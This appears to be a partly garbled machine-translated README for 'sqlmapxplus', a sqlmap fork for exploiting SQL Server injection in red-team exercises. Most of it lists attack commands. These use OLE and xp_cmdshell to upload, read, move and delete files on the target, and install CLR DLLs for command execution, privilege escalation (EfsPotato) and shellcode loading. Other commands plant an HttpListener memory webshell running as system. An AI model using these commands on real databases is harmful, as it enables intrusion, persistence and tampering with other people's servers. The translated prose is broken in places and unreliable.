Dans de nombreux exercices d'attaque et de défense régionaux, l'injection de pile de base de données SQL Server présente toujours une fréquence élevée de trous. Cependant, en raison de certaines restrictions courantes des scénarios d'exercice, telles que l'absence d'accès au réseau, de faibles autorisations, la séparation des sites et des bases de données, la protection des terminaux, la difficulté. en allant en ligne, la maintenance des autorisations est fastidieuse et un seul --os-shell ne peut plus répondre à nos besoins.
sqlmapxplus est basé sur sqlmap, rouvrant l'outil classique d'exploitation des vulnérabilités de base de données, faisant référence à diverses solutions et ajoutant des méthodes d'utilisation d'injection de base de données MSSQL. À l'heure actuelle, une partie du deuxième développement est terminée, y compris le téléchargement de fichiers ole et la fonction de chargement automatisé du shellcode.
Instructions de mise à jour 20240508 : Fonction nouvellement ajoutée d'ouverture d'ole, nouvelle fonction de lecture des fichiers spécifiés, nouvelle fonction de déplacement des fichiers spécifiés, nouvelle fonction de copie des fichiers spécifiés, nouvelle fonction de suppression des fichiers spécifiés, nouvelle fonction de détermination de l'emplacement des fichiers spécifiés, nouveau fonction de stockage Fonction de requête de processus, nouvelle fonction de suppression de processus stocké, modification de la méthode de téléchargement ole, modification du processus d'installation clr, modification de la méthode d'exécution de la commande clr, suppression des erreurs causées par les commentaires chinois
Visant le problème de l'échec de l'installation de clr causé par la perte de transmission de la dll pendant le processus réseau réel (solution temporaire). Il s'avère que la dll clr utilisée dans la fonction --install-clr d'origine est trop volumineuse et qu'un grand nombre d'injections sont souvent requis dans le combat réel. Si le processus d'injection, une certaine erreur entraînera l'échec de la mise en œuvre de la DLL et la saisie de la DLL ne sera pas possible. Le processus d'installation automatique d'origine en un clic est maintenant supprimé et modifié pour permettre à l'utilisateur de personnaliser le. Installation de la dll en fonction de la situation cible réelle et ajout temporaire de --check- L'option de fichier détermine si le fichier dll est correctement atterri sur l'hôte cible. Ajoutez temporairement --check-clr pour déterminer si la fonction définie par l'utilisateur est chargée avec succès. la base de données.
Pourquoi le problème d'amplification des DLL se produit-il lors du processus de téléchargement ? La conversion en hexadécimal puis la restauration entraînent une augmentation du fichier. Par exemple, la lettre A sera convertie en 41 en hexadécimal, doublant ainsi la taille.
Problèmes de personnalisation de clr (terminé) install-clr est modifié pour nécessiter la spécification du chemin clr.dll personnalisé. Entrez le nom de classe défini par l'utilisateur dans la zone d'invite et le nom de méthode défini par l'utilisateur. mode clr_shell. en mode clr_shell est modifié en : La fonction définie par l'utilisateur passe les paramètres (terminé)
File system access: --xp-upload upload file by xp_cmdshell --ole-upload upload file by ole --check-file use xp_fileexis check file exist --ole-del delete file by ole --ole-read read file content by ole --ole-move move file by ole --ole-copy copy file by ole Operating system access: --enable-clr enable clr --disable-clr disable clr --enable-ole enable ole --check-clr check user-defined functions in the database --del-clr delete user-defined functions in the database --install-clr install clr --clr-shell clr shell --sharpshell-upload1 sharpshell upload1 --sharpshell-upload2 sharpshell upload2
à propos de vieux :
# 开启 ole 利用功能 python sqlmap.py -r/-u xxx --enable-ole # 通过 ole 上传文件 python sqlmap.py -r/-u xxx --ole-upload local_file_path --file-dest remote_file_path # 通过 ole 删除指定文件 python sqlmap.py -r/-u xxx --ole-del remote_file_path # 通过 ole 阅读指定文件 python sqlmap.py -r/-u xxx --ole-read remote_file_path # 通过 ole 移动并重命名文件 python sqlmap.py -r/-u xxx --ole-move remote_file_path1 --file-dest remote_file_path # 通过 ole 复制文件 python sqlmap.py -r/-u xxx --ole-copy remote_file_path1 --file-dest remote_file_path2 # 通过 ole 实现的HttpListener内存马上传方式 # 默认上传至c:Windowstaskslisten.tmp.txt,需要以system权限运行 python sqlmap.py -r/-u xxx --sharpshell-upload2
autres fonctions :
# 通过 xp_cmdshell 上传文件 python sqlmap.py -r/-u xxx --xp-upload local_file_path --file-dest remote_file_path # 使用 xp_fileexis 来检查文件是否存在 python sqlmap.py -r/-u xxx --check-file remote_file_path # 查询数据库中是否存在用户自定义函数 python sqlmap.py -r/-u xxx --check-clr clr_function_name # 删除用户自定义函数 python sqlmap.py -r/-u xxx --del-clr clr_function_name # 通过 xp_cmdshell实现的HttpListener内存马上传方式 # 默认上传至c:Windowstaskslisten.tmp.txt,需要以system权限运行 python sqlmap.py -r/-u xxx --sharpshell-upload1
à propos de clr :
# 开启 clr 利用功能 python sqlmap.py -r/-u xxx --enable-clr # 关闭 clr 利用功能 python sqlmap.py -r/-u xxx --disable-clr # 进入 clr 安装模式 python sqlmap.py -r/-u xxx --install-clr # 进入 clr-shell 命令交互模式 python sqlmap.py -r/-u xxx --clr-shell # clr dll 参考如下,更多其他dll请参考星球获取 # 存储过程类名Xplus,存储过程函数名需要注意大小写,分别为 # ClrExec、ClrEfsPotato、ClrDownload、ClrShellcodeLoader # 对应项目目录下单独功能的dll,分别为 clrexec.dll clrefspotato.dll clrdownload.dll clrshellcodeloader.dl
Compte public : Cyber Guerre
Knowledge Planet : Guide des tests d'intrusion
Lien de référence pour l'ancienne version : https://mp.weixin.qq.com/s/nTYPKnl9XQLWhZ43sQV3xw
Lien de référence pour la nouvelle version : https://mp.weixin.qq.com/s/6RpxXitEPt8rA1DFb56Oxw
https://github.com/sqlmapproject/sqlmap
https://github.com/uknowsec/SharpSQLTools
https://github.com/Anion3r/MSSQLProxy
https://mp.weixin.qq.com/s/X0cI85DdB17Wve2qzCRDbg
https://yzddmr6.com/posts/asp-net-memory-shell-httplistener/